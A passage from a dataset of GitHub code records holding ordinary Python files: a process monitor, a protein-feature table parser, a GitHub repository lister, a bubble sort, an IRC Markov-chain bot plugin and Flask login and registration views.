interval(minutes),default 10 minutes')\n parser.add_argument('-c', '--command', type=str, help='Execute command when target down, eg:\"shutdown 0\"')\n args = parser.parse_args()\n process_name = args.process_name\n interval = args.interval\n command = args.command\n\n while True:\n print('sleeping...')\n time.sleep(60 * interval)\n process_count = 0\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid', 'name'])\n if pinfo['name'] == process_name:\n process_count += 1\n except psutil.NoSuchProcess:\n pass\n\n if process_count > 0:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()), 'process still running...')\n else:\n s = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + ' process down'\n f = open('process_monitor.log', 'a', encoding='utf-8')\n f.write(s)\n f.close()\n print(s)\n time.sleep(10)\n os.system(command)\n exit()\n", "repo_name": "hhuayuan/process-monitor", "sub_path": "process_monitor.py", "file_name": "process_monitor.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "psutil.process_iter", "line_number": 23, "usage_type": "call"}, {"api_name": "psutil.NoSuchProcess", "line_number": 28, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 34, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "27852705443", "text": "\"\"\"\n@author: mguarin0\ndesc:\n\"\"\"\n\nimport os\nfrom timeit import default_timer as timer\nimport logging\nimport traceback\nimport numpy as np\nfrom utils import *\n\n__author__ = \"Michael Guarino\"\n__version__ = \"0.1\"\n__all__ = [\n \"protrusion_idx_hydrophobicity_main\"\n]\n\ndef _tbl_file_reader(path_to_tbl_file, complex_code):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n assert(os.path.isfile(path_to_tbl_file)), \"file does not exist\"\n start_idx_data = 7 # first 7 lines are all meta info\n with open(path_to_tbl_file, \"r\") as file:\n psaia_records = []\n for i, line in enumerate(file.readlines()[start_idx_data:]):\n if i == 0:\n headers = list(map(lambda x: x.replace(\" \", \"_\"), list(filter(None, map(str.strip, line.split(\"|\"))))))\n else:\n current_line = list(filter(None, map(str.strip, line.split(\" \"))))\n if len(headers)!=len(current_line):\n logging.error(\"|| complex_code: {} \"\n \"|| len(headers): {} \"\n \"|| len(current_line): {} \"\n \"|| line number: {}\".format(complex_code,\n len(headers),\n len(current_line),\n i+7))\n logging.error(\"|| complex_code: {} \"\n \"|| headers: {}\".format(complex_code,\n headers))\n logging.error(\"|| complex_code: {} \"\n \"|| current_line: {}\".format(complex_code,\n current_line))\n psaia_records.append(dict(zip(headers, current_line)))\n return psaia_records\n# end\n\ndef _create_final_format(psaia_output_records, complex_code):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n psaia = {}\n for i_res, res in enumerate(psaia_output_records):\n chain_id = \"{}_{}\".format(res[\"chain_id\"],\n complex_code)\n res_id = \"{}_{}_{}\".format(res[\"res_id\"],\n str(i_res),\n res[\"res_name\"])\n if (chain_id, res_id) in psaia.keys():\n logging.error(\"|| complex_code: {} \"\n \"|| dst_agl already contains key: {}\".format(complex_code,\n list(map(str, (chain_id, res_id)))))\n psaia[(chain_id, res_id)] = [res[\"average_CX\"], \n res[\"s_avg_CX\"],\n res[\"s-ch_avg_CX\"],\n res[\"s-ch_s_avg_CX\"],\n res[\"max_CX\"],\n res[\"min_CX\"],\n res[\"Hydrophobicity\"]]\n return psaia\n# end\n\ndef protrusion_idx_hydrophobicity_main(kwargs):\n \"\"\"\n desc:\n args:\n returns:\n \"\"\"\n\n start_time = timer()\n try:\n assert(all(k in [\"run_type\", \"tbl_filename\"]\n for k in kwargs.keys())), \"incorrect list of args\"\n \n assert(kwargs[\"run_type\"]==\"r_protrusion_idx\"), \"run type does not match argument passed\"\n assert(os.path.exists(kwargs[\"tbl_filename\"])), \"tbl filename does not exist\"\n \n filename, ext = kwargs[\"tbl_filename\"].split(\"/\")[-1].split(\".\")\n assert(ext==\"tbl\"), \"file extension must be .tbl\"\n complex_code = filename[:4]\n \n logging.info(\"|| complex_code: {} \"\n \"|| tbl_filename: {}\".format(complex_code,\n kwargs[\"tbl_filename\"]))\n \n psaia_output_records = _tbl_file_reader(path_to_tbl_file=kwargs[\"tbl_filename\"],\n complex_code=complex_code)\n final_format_protrusion_idxs = _create_final_format(psaia_output_records=psaia_output_records,\n complex_code=complex_code) \n \n paths = prjPaths(run_type=kwargs[\"run_type\"])\n to_pickle(obj_to_pickle=final_format_protrusion_idxs,\n path=os.path.join(paths.RUN_TYPE_OUT_DIR,\n \"r_protrusion_idx_{}.p\".format(complex_code)))\n end_time = timer()\n run_time = end_time-start_time\n logging.info(\"|| complex_code: {} \"\n \"|| protrusion_idx and hydrophobicity shape: ({}, {})\".format(complex_code,\n len(final_format_protrusion_idxs),\n len(final_format_protrusion_idxs[list(final_format_protrusion_idxs.keys())[0]])))\n logging.info(\"|| complex_code: {} \"\n \"|| run time (in seconds): {}\".format(complex_code,\n run_time))\n return_msg = {complex_code: run_time}\n except Exception as err:\n logging.error(\"|| filename: {} \"\n \"|| error thrown: {}\".format(kwargs[\"ent_filename\"],\n traceback.format_exc()))\n end_time = timer()\n run_time = end_time-start_time\n return_msg = {kwargs[\"ent_filename\"]: run_time}\n pass\n finally:\n return return_msg\n# end\n", "repo_name": "mguarin0/test-transfer", "sub_path": "fout_preprocessing/src/psaiaFeatures.py", "file_name": "psaiaFeatures.py", "file_ext": "py", "file_size_in_byte": 5609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 66, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "timeit.default_timer", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 117, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 124, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "36869230298", "text": "import requests\n\n\nclass ListRepositories():\n API_BASE_URL = \"https://api.github.com\"\n\n def __init__(self, user):\n self._user = user\n\n def get_repos_by_user(self):\n response = requests.get(\n f\"{self.API_BASE_URL}/users/{self._user}/repos\")\n\n if response.status_code == 200:\n return {\n \"status_code\": 200,\n \"body\": response.json()\n }\n return {\n \"status_code\": response.status_code,\n \"body\": \"Error while getting repositories\"\n }\n\n def parse_response(self):\n response = self.get_repos_by_user()\n body = response[\"body\"]\n\n if response[\"status_code\"] == 200:\n for idx in range(len(body)):\n print(f\"{body[idx]['id']} - {body[idx]['name']} - {body[idx]['stargazers_count']}\")\n\n\nif __name__ == \"__main__\":\n respo = ListRepositories(\"thiagoneye\")\n respo.parse_response()\n", "repo_name": "thiagoneye/course-solid", "sub_path": "01. [S]ingle Responsibility Principle/problem.py", "file_name": "problem.py", "file_ext": "py", "file_size_in_byte": 947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "30783468571", "text": "from sys import stdin, stdout\nfrom typing import List\n\n\ndef bubble_sort(arr_length, arr: List[int]) -> List[int]:\n \"\"\"Пузырьковая сортировка\"\"\"\n is_sorted = False\n n = 1\n while not is_sorted:\n is_sorted = True\n for i in range(arr_length - n):\n if arr[i] > arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n is_sorted = False\n n += 1\n\n return arr\n\n\nif __name__ == '__main__':\n array_length = int(stdin.readline())\n array = [int(x) for x in stdin.readline().split()]\n for a in bubble_sort(array_length, array):\n stdout.write(str(a) + ' ')\n", "repo_name": "ZingyKizz/MADE", "sub_path": "algo/1/B.py", "file_name": "B.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}, {"api_name": "sys.stdin.readline", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 21, "usage_type": "name"}, {"api_name": "sys.stdin.readline", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 22, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "44070449131", "text": "# -*- coding: utf-8 -*-\n\nfrom stdPlugin import stdPlugin\nfrom lib.markov import Markov\n\n\nclass learn(stdPlugin):\n u'''Apprend continuellement les mots utilisés sur un canal, et génère des\n phrases aléatoires et stupides.\n '''\n\n events = {'pubmsg': {'exclusive': False, 'command_namespace': 'say'},\n 'privmsg': {'exclusive': False, 'command_namespace': 'say'},\n 'action': {'exclusive': False},\n 'join': {'exclusive': False},\n 'run': {'frequency': (300, 30000)},\n }\n markov = Markov()\n\n def __init__(self, bot, conf):\n return_val = super(learn, self).__init__(bot, conf)\n chans = self.bot.conf['chans'] if not self.bot.channels else \\\n self.bot.channels\n for chan in chans:\n self.get_dico(chan)\n return return_val\n\n def parse(self, chan, message):\n self.markov.add_sentence(chan, message)\n self.save_dico(chan)\n\n def on_pubmsg(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_privmsg(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_action(self, serv, ev, helper):\n self.parse(helper['target'], helper['message'])\n return False\n\n def on_join(self, serv, ev, helper):\n if helper['sender'] == serv.username: # si c’est notre propre join\n self.get_dico(helper['target'])\n return False\n else:\n return False\n\n def on_cmd(self, serv, ev, command, args, helper):\n u'''%(namespace)s sentence : génère une phrase aléatoire.\n %(namespace)s sentence : génère une phrase aléatoire contenant\n le mot donné, s’il est connu.\n %(namespace)s stats : indique le nombre de mots connus pour le canal\n courant'''\n if command == 'sentence':\n if len(args) == 0:\n serv.privmsg(helper['target'], self.markov.\n get_sentence(helper['target']))\n return True\n else:\n serv.privmsg(helper['target'], self.markov.\n get_sentence(helper['target'], args[0]))\n return True\n # elif command == 'save':\n # if self.save_dico(helper['target']):\n # serv.privmsg(helper['target'], u'Dictionnaire sauvegardé : '\n # '%d mots' % self.get_stats(helper['target']))\n # return True\n # else:\n # serv.privmsg(helper['target'], u'Erreur lors de la '\n # 'sauvegarde du dictionnaire !')\n # return True\n elif command == 'stats':\n serv.privmsg(helper['target'], u'Mot connus : %d' % self.markov.\n get_stats(helper['target']))\n return True\n else:\n serv.privmsg(helper['target'], u'Je ne connais pas cette '\n 'commande.')\n return True\n\n def get_dico(self, chan):\n data = self.bot.get_config(self, chan, self.markov.default_data())\n self.markov.load(chan, data)\n\n def save_dico(self, chan):\n data = self.markov.dump(chan)\n return self.bot.write_config(self, chan, data)\n\n def on_run(self, serv, helper):\n serv.privmsg(helper['target'], self.markov.\n get_sentence(helper['target']))\n", "repo_name": "vegaelle/naobot", "sub_path": "plugins/learn.py", "file_name": "learn.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stdPlugin.stdPlugin", "line_number": 7, "usage_type": "name"}, {"api_name": "lib.markov.Markov", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "19933700586", "text": "from flask import (Blueprint, current_app, flash, redirect, render_template,\n request, session, url_for)\nfrom flask.views import MethodView\nfrom werkzeug.datastructures import MultiDict\n\nfrom src.extensions import db\nfrom src.mailers.send_mail import send_mail_for_aprove\nfrom src.user.auth import SessionAuth\nfrom src.user.decorators import login_required\nfrom src.user.forms import (ChangeAvatarForm, LoginForm, ProfileForm,\n ProfileOAuthForm, RegistrationForm,\n ResendEmailForm)\nfrom src.user.models import User\nfrom src.views import BaseView\n\nbp = Blueprint('auth', __name__, template_folder='templates')\n\n\nclass Registration(MethodView):\n\n def __init__(self, template_name):\n self.template: str = template_name\n self.form = RegistrationForm\n self.context = {'oauth_backend': current_app.config['OAUTH_BACKEND']}\n\n def post(self):\n self.context['form'] = form = self.form(request.form) # noqa: WPS204\n\n if not form.validate():\n return render_template(self.template, **self.context) # noqa: WPS204\n\n login = request.form.get('login')\n email = request.form.get('email')\n password = request.form.get('password')\n firstname = request.form.get('firstname')\n middlename = request.form.get('middlename')\n lastname = request.form.get('lastname')\n image = request.form.get('email')\n pass_hash = User.hash_password(password)\n user = User(\n login=login,\n email=email,\n password=pass_hash.decode(),\n firstname=firstname,\n middlename=middlename,\n lastname=lastname,\n image=image,\n gravatar='gravatar',\n )\n if User.query.filter_by(login=login).first():\n flash('Логин уже занят.', 'error')\n return render_template(\n self.template,\n **self.context,\n )\n if User.query.filter_by(email=email).first():\n flash('Такой e-mail уже привязан к другому аккаунту.', 'error')\n return render_template(\n self.template,\n **self.context,\n )\n User.save(user)\n if send_mail_for_aprove(user):\n flash('Вам на почту отправлена ссылка для подтверждения регистрации', 'info')\n else:\n flash('Сбой отправки письма', 'error')\n return redirect(url_for('auth.login'))\n\n def get(self):\n self.context['form'] = self.form()\n return render_template(self.template, **self.context)\n\n\nclass Login(MethodView):\n def __init__(self, template_name):\n self.template = template_name\n self.form = LoginForm\n self.context = {'oauth_backend': current_app.config['OAUTH_BACKEND']}\n\n def get(self):\n self.context['form'] = self.form()\n return render_template(self.template, **self.context)\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n\n if not form.validate():\n return render_template(self.template, **self.context)\n\n login = request.form['login']\n password = request.form['password']\n\n user = User.query.filter_by(\n login=login,\n ).first()\n\n if user and User.check_password(user, password):\n if not user.is_aproved:\n flash('Завершите регистрацию, пройдя по ссылке, отправленной на почту', 'error')\n return redirect(url_for('auth.login'))\n session['auth'] = SessionAuth(True, user)\n if request.referrer and 'answer' in request.referrer:\n return redirect(request.referrer)\n return redirect(url_for('index.home'))\n flash('Неверный логин или пароль!', 'error')\n return render_template(self.template, **self.context)\n\n\nclass Profile(BaseView):\n def __init__(self, template_name):\n super().__init__(template_name)\n self.user = session['auth'].user\n self.form = ProfileForm\n\n def get(self):\n if self.user.is_oauth:\n return redirect(url_for('auth.profile_oauth'))\n user_data = MultiDict([\n ('email', self.user.email),\n ('firstname', self.user.firstname),\n ('middlename', self.user.middlename),\n ('lastname', self.user.lastname),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n if not form.validate():\n return render_template(self.template, **self.context)\n User.query.filter_by(login=session['auth'].user.login).update({\n 'email': request.form.get('email'),\n 'firstname': request.form.get('firstname'),\n 'middlename': request.form.get('middlename'),\n 'lastname': request.form.get('lastname'),\n })\n return redirect(url_for('auth.profile'))\n\n\nclass ProfileOAuth(BaseView):\n \"\"\"Профиль участников, у кого подключён OAuth.\"\"\"\n\n def __init__(self, template_name):\n super().__init__(template_name)\n self.form = ProfileOAuthForm\n self.user = session['auth'].user\n\n def post(self):\n self.context['form'] = form = self.form(request.form)\n if not form.validate():\n return render_template(self.template_name, **self.context)\n login = request.form.get('login')\n email = request.form.get('email')\n firstname = request.form.get('firstname')\n middlename = request.form.get('middlename')\n lastname = request.form.get('lastname')\n user_data = {\n 'login': login,\n 'email': email,\n 'firstname': firstname,\n 'middlename': middlename,\n 'lastname': lastname,\n 'image': email,\n }\n # отдельно смотрим пароль:\n # если стоит флаг, то меняем\n # если пароль пустой, то сбрасываем\n if request.form.get('change_password'):\n password = request.form.get('password') if request.form.get('password') else False\n pass_hash = User.hash_password(password).decode() if password else ''\n user_data['password'] = pass_hash\n\n if login != self.user.login:\n if User.query.filter_by(login=login).first():\n flash('Логин уже занят.', 'error')\n return render_template(\n self.template_name,\n **self.context,\n )\n\n if email != self.user.email:\n if User.query.filter_by(email=email).first():\n flash('Такой e-mail уже привязан к другому аккаунту.', 'error')\n return render_template(\n self.template_name,\n **self.context,\n )\n\n User.query.filter_by(github_id=self.user.github_id).update(user_data)\n return redirect(url_for('.profile_oauth'))\n\n def get(self):\n if self.user.is_oauth:\n user_data = MultiDict([\n ('login', self.user.login),\n ('email', self.user.email),\n ('change_password', False),\n ('firstname', self.user.firstname),\n ('middlename', self.user.middlename),\n ('lastname', self.user.lastname),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n return redirect(url_for('index.home'))\n\n\nclass Logout(MethodView):\n def get(self):\n auth = session.get('auth')\n auth.logout()\n return redirect(url_for('index.home'))\n\n\nclass EmailAprove(MethodView):\n \"\"\"Функция проверки ссылки.\n\n по ней переходит пользователь, завершая регистрацию\n \"\"\"\n\n def get(self, token):\n user = User.verify_token_for_mail_aproved(token)\n if not user:\n return redirect(url_for('index.home'))\n return redirect(url_for('auth.login'))\n\n\nclass EmailResend(MethodView):\n \"\"\"Resend email function.\"\"\"\n\n def __init__(self, template_name):\n self.template: str = template_name\n self.form = ResendEmailForm\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n return render_template(self.template, **{'form': form})\n email = request.form.get('email')\n\n user = User.query.filter_by(email=email).first()\n if user:\n if send_mail_for_aprove(user):\n flash('Вам на почту отправлена ссылка для подтверждения регистрации', 'info')\n else:\n flash('Сбой отправки письма', 'error')\n else:\n flash('Пользователь с таким email не зарегистрирован', 'error')\n return redirect(url_for('auth.login'))\n\n def get(self):\n return render_template(self.template, **{'form': self.form()})\n\n\nclass ChangeAvatar(BaseView):\n def __init__(self, template_name):\n super().__init__(template_name)\n self.user = session['auth'].user\n self.form = ChangeAvatarForm\n\n def get(self):\n if self.user.gravatar:\n avatar_type = 'gravatar'\n else:\n avatar_type = 'face'\n\n user_data = MultiDict([\n ('chosen_avatar', avatar_type),\n ('avatar_img_str', self.user.image),\n ])\n self.context['form'] = self.form(user_data)\n return render_template(self.template_name, **self.context)\n\n def post(self):\n # выбор типа аватарки - граватар или рожица\n avatar_type = request.form.get('chosen_avatar')\n new_img = self.user.image\n if request.form.get('avatar_img_str'):\n new_img = request.form.get('avatar_img_str')\n\n # если аватар по умолчанию -\n # подтягивается граватар по email пользователя\n if request.form.get('default_avatar'):\n avatar_type = 'gravatar'\n new_img = self.user.email\n User.query.filter_by(login=session['auth'].user.login).update({\n 'image': new_img,\n 'gravatar': avatar_type,\n })\n db.session.commit()\n\n return redirect(url_for('auth.change_avatar'))\n\n\nbp.add_url_rule(\n '/logout/',\n view_func=login_required(Logout.as_view(\n name='logout',\n )),\n)\n\nbp.add_url_rule(\n '/registration/',\n view_func=Registration.as_view(\n name='registration',\n template_name='user/register_form.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/login/',\n view_func=Login.as_view(\n name='login',\n template_name='user/login.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/profile/',\n view_func=login_required(Profile.as_view(\n name='profile',\n template_name='user/profile_form.jinja2',\n )),\n)\n\nbp.add_url_rule(\n '/profile_oauth/',\n view_func=login_required(ProfileOAuth.as_view(\n name='profile_oauth',\n template_name='user/profile_oauth_form.jinja2',\n )),\n)\n\nbp.add_url_rule(\n '/email_aprove/',\n view_func=EmailAprove.as_view(\n name='email_aprove',\n ),\n)\n\nbp.add_url_rule(\n '/resend_email/',\n view_func=EmailResend.as_view(\n name='resend_email',\n template_name='user/resend_email_form.jinja2',\n ),\n)\n\nbp.add_url_rule(\n '/change_avatar/',\n view_func=ChangeAvatar.as_view(\n name='change_avatar',\n template_name='user/change_avatar.jinja2',\n ),\n)\n", "repo_name": "honeydev/junior", "sub_path": "src/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Blueprint", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 19, "usage_type": "name"}, {"api_name": "src.user.forms.RegistrationForm", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "src.user.models.User.hash_password", "line_number": 39, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 39, "usage_type": "name"}, {"api_name": "src.user.models.User", "line_number": 40, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 50, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 50, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 56, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 56, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "src.user.models.User.save", "line_number": 62, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "src.mailers.send_mail.send_mail_for_aprove", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 74, "usage_type": "name"}, {"api_name": "src.user.forms.LoginForm", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 93, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 93, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 93, "usage_type": "name"}, {"api_name": "src.user.models.User.check_password", "line_number": 97, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 97, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 101, "usage_type": "name"}, {"api_name": "src.user.auth.SessionAuth", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.referrer", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.referrer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 112, "usage_type": "name"}, {"api_name": "src.user.forms.ProfileForm", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 117, "usage_type": "call"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 130, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 131, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 131, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 137, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 140, "usage_type": "name"}, {"api_name": "src.user.forms.ProfileOAuthForm", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 153, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 154, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 156, 